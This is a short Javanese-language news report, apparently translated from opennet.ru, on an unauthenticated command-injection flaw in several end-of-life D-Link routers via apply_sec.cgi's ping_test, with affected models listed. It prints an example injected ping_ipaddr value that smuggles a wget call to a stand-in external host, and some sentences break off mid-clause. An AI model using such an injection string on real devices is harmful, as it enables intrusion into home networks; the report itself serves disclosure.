Ing router nirkabel D-Link
Apike, miturut pangembang perangkat kukuh, telpon "ping_test" kudu dieksekusi mung sawise otentikasi, nanging ing kasunyatan kasebut diarani apa wae, preduli saka mlebu menyang antarmuka web. Utamane, nalika ngakses skrip apply_sec.cgi lan ngliwati parameter "action = ping_test", skrip kasebut dialihake menyang kaca otentikasi, nanging ing wektu sing padha nindakake tumindak sing ana gandhengane karo ping_test. Kanggo nglakokake kode kasebut, kerentanan liyane digunakake ing ping_test dhewe, sing nelpon sarana ping tanpa mriksa kanthi bener alamat IP sing dikirim kanggo dites. Contone, kanggo nelpon utilitas wget lan nransfer asil printah "echo 1234" menyang host eksternal, mung nemtokake parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http: // test.test/?$( echo 1234)".
Anane kerentanan wis dikonfirmasi kanthi resmi ing model ing ngisor iki:
- DIR-655 karo perangkat kukuh 3.02b05 utawa lawas;
- DIR-866L karo perangkat kukuh 1.03b04 utawa lawas;
- DIR-1565 karo perangkat kukuh 1.01 utawa lawas;
- DIR-652 (ora ana informasi babagan versi perangkat kukuh sing duwe masalah)
Periode dhukungan kanggo model kasebut wis kadaluwarsa, mula D-Link
Banjur ditemokake yen kerentanan kasebut uga
Source: opennet.ru